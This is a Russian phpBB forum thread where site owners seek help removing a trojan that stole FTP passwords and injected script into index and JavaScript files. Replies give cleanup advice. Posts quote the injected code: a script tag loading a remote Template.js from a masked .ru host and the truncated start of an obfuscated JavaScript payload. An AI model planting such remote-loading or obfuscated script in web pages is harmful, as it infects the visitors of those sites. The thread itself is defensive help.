обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
-
AdmninsCluba
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: появились ошибки - ничего не делал
Удалить надо только это.spylook писал(а):Код: Выделить всё
<script type="text/javascript" src="http://****.ru/Template.js"></script>
Обозначает простую вещь: при загрузке страницы браузер запрашивает файл
http://****.ru/Template.js и исполняет его.-
spylook
- phpBB 1.0.0
- Сообщения: 6
- Стаж: 14 лет 8 месяцев
Re: появились ошибки - ничего не делал
есть следом ещё одна строка, её тоже убрать?
<!--d36971354de1399e5378329bdff1b65b-->
<!--d36971354de1399e5378329bdff1b65b-->
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: появились ошибки - ничего не делал
Это комментарий. Да, убери, он не нужен.
Кстати, аналогичный код был добавлен во все файлы
Кстати, аналогичный код был добавлен во все файлы
*.js и index.*, не забудь их почистить.-
spylook
- phpBB 1.0.0
- Сообщения: 6
- Стаж: 14 лет 8 месяцев
Re: Как убить Трояна?
Продержался после чистки около недели и снова та же хрень..
Форум 3.0.7-PL1
Комп вроде чистый.. Как думаете что за?
Форум 3.0.7-PL1
Комп вроде чистый.. Как думаете что за?
-
MAzZY
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Вроде - у бабки в огородеspylook писал(а):Комп вроде чистый
Не шляться по левым сайтам, по порнухе. Установить ФФ, антивирус с постоянными обновлениями и файервол.
-
Mr. Anderson
- phpBB Guru
- Сообщения: 7522
- Стаж: 21 год 1 месяц
- Откуда: СССР
- Благодарил (а): 4 раза
- Поблагодарили: 94 раза
Re: Как убить Трояна?
MAzZY
Забыл одно - сменить все пароли и перепроверить файло на сервере на предмет "посторонней левости".
Забыл одно - сменить все пароли и перепроверить файло на сервере на предмет "посторонней левости".
Правила конференции (30.05.2011) | Общие ошибки новичков (07.11.2005) | Шаблон запроса | FAQ (phpBB 3.0.x) / Мини [FAQ] по phpBB 3.1.x
Последние и единственно актуальные на сегодня версии - 3.1.12 и 3.2.2!
Небесплатно накачаю ваш VPS/VDS/DS стероидами и заставлю ваши CMS летать =)
phpBB Guru blog | Тестируем phpBB 3.3 здесь! |
Последние и единственно актуальные на сегодня версии - 3.1.12 и 3.2.2!
Небесплатно накачаю ваш VPS/VDS/DS стероидами и заставлю ваши CMS летать =)
phpBB Guru blog | Тестируем phpBB 3.3 здесь! |
-
MAzZY
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Это как чистить, а я написал как уберечься. У него же не в первый раз, наверное, знает, как чистить
-
Mr. Anderson
- phpBB Guru
- Сообщения: 7522
- Стаж: 21 год 1 месяц
- Откуда: СССР
- Благодарил (а): 4 раза
- Поблагодарили: 94 раза
Re: Как убить Трояна?
MAzZY
Именно - не первый раз. В 95% случаев это означает, что не знает.
Именно - не первый раз. В 95% случаев это означает, что не знает.
Правила конференции (30.05.2011) | Общие ошибки новичков (07.11.2005) | Шаблон запроса | FAQ (phpBB 3.0.x) / Мини [FAQ] по phpBB 3.1.x
Последние и единственно актуальные на сегодня версии - 3.1.12 и 3.2.2!
Небесплатно накачаю ваш VPS/VDS/DS стероидами и заставлю ваши CMS летать =)
phpBB Guru blog | Тестируем phpBB 3.3 здесь! |
Последние и единственно актуальные на сегодня версии - 3.1.12 и 3.2.2!
Небесплатно накачаю ваш VPS/VDS/DS стероидами и заставлю ваши CMS летать =)
phpBB Guru blog | Тестируем phpBB 3.3 здесь! |
-
spylook
- phpBB 1.0.0
- Сообщения: 6
- Стаж: 14 лет 8 месяцев
Re: Как убить Трояна?
Хорошие у Всас советы 
я же ветку итак прочитал...
Вот что удалось выяснить:
Этот код загружает на компьютер файл: C:\WINDOWS\system32\drivers\aec.sys
оригинальный же переименовывает в aec.sys.bak
Удаляется aec.sys только через безопасный режим. Файл aec.sys.bak переименовывается обратно в aec.sys ...
А у меня Avira не считал его вирусом...
я же ветку итак прочитал...Вот что удалось выяснить:
Этот код загружает на компьютер файл: C:\WINDOWS\system32\drivers\aec.sys
оригинальный же переименовывает в aec.sys.bak
Удаляется aec.sys только через безопасный режим. Файл aec.sys.bak переименовывается обратно в aec.sys ...
А у меня Avira не считал его вирусом...
-
Поручик
- Former team member
- Сообщения: 3942
- Стаж: 19 лет 11 месяцев
- Откуда: Оренбург (Южный Урал)
- Благодарил (а): 3 раза
Re: Как убить Трояна?
Avasta меня не раз выручала.
Профессионал - тот же дилетант, только знающий, где ошибётся.
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции
наш форум http://forum.aeroion.ru/cat1.html
-
serega--909
- phpBB 1.0.0
- Сообщения: 9
- Стаж: 14 лет 10 месяцев
Re: Как убить Трояна?
Здравствуйте.
Сразу скажу, что тему всю не осилил, но при беглом просмотре не нашел ответа на свой вопрос.
Поймал я как то троянца, Avast Free его запросто впустил. Этот гад(троян) положил все браузеры кроме Оперы portable и стырил пароли от FTP. После чего заразил все index'ные файлы в форуме кодом следующего содержания:
Что было предпринято:
1. Скачан из интернета CureIT, который нашел троянца и загасил. После этого браузеры стали запускаться.
2. Изменены пароли от FTP аккаунтов и очищена в суматохе оставленная злополучная история FileZilla
3. Почищены все файлы index.htm, index.php и index.html от этого скрипта.
4. Очищен кэш форума.
Проблема:
В форуме так и остался гадкий скрипт, а через какой файл он туда забрался для меня остается загадкой. Все файлы index почищены, а код на месте. В каком файле мне ещё его поискать? (В файлах шаблона footer header искал - там чисто). И ещё один косяк - шрифт форума стал гораздо больше! Прошу помощи в своем нелегком деле у тех, кто разбирается в вопросе.
Заранее благодарен за ответ!
PS Версия форума 3.0.7
Сразу скажу, что тему всю не осилил, но при беглом просмотре не нашел ответа на свой вопрос.
Поймал я как то троянца, Avast Free его запросто впустил. Этот гад(троян) положил все браузеры кроме Оперы portable и стырил пароли от FTP. После чего заразил все index'ные файлы в форуме кодом следующего содержания:
Код: Выделить всё
<script type="text/javascript">var vgO2cA99ga = "QsEus17QsEus31";var dmt8LjnsH80 = "QsEus3cQsEus73QsEus63QsEus72Q"; var dmt8LjnsH81 = ....1. Скачан из интернета CureIT, который нашел троянца и загасил. После этого браузеры стали запускаться.
2. Изменены пароли от FTP аккаунтов и очищена в суматохе оставленная злополучная история FileZilla
3. Почищены все файлы index.htm, index.php и index.html от этого скрипта.
4. Очищен кэш форума.
Проблема:
В форуме так и остался гадкий скрипт, а через какой файл он туда забрался для меня остается загадкой. Все файлы index почищены, а код на месте. В каком файле мне ещё его поискать? (В файлах шаблона footer header искал - там чисто). И ещё один косяк - шрифт форума стал гораздо больше! Прошу помощи в своем нелегком деле у тех, кто разбирается в вопросе.
Заранее благодарен за ответ!
PS Версия форума 3.0.7
-
MAzZY
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Да я уже задолбалсяserega--909 писал(а):Сразу скажу, что тему всю не осилил
Как убить Трояна?
Добавлено спустя 2 минуты 48 секунд:
И в папке cache удалите все файлы, кроме index.htm(его тоже проверьте на вирус) и .htaccess
-
serega--909
- phpBB 1.0.0
- Сообщения: 9
- Стаж: 14 лет 10 месяцев
Re: Как убить Трояна?
Ну вообще то я выше написал, что всё это уже проделал!!!MAzZY писал(а):Да я уже задолбалсяКак убить Трояна?Добавлено спустя 2 минуты 48 секунд:И в папке cache удалите все файлы, кроме index.htm(его тоже проверьте на вирус) и .htaccess
Вопрос звучит так: "Какие файлы КРОМЕ index могут быть заражены?"
Методом "наобум" я просмотрел несколько просто выдернутых из форума файлов - они чистые. Во всех индексных скрипт удален, но в коде форума он стоит в самом начале!
Последний раз редактировалось MAzZY 31.10.2010 20:17, всего редактировалось 1 раз.
Причина: убил ссылку
Причина: убил ссылку
-
MAzZY
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Значит поиском по файлам. Что непонятного?
По нормальному, надо было бэкап восстановить и не парить никому мозни
По нормальному, надо было бэкап восстановить и не парить никому мозни
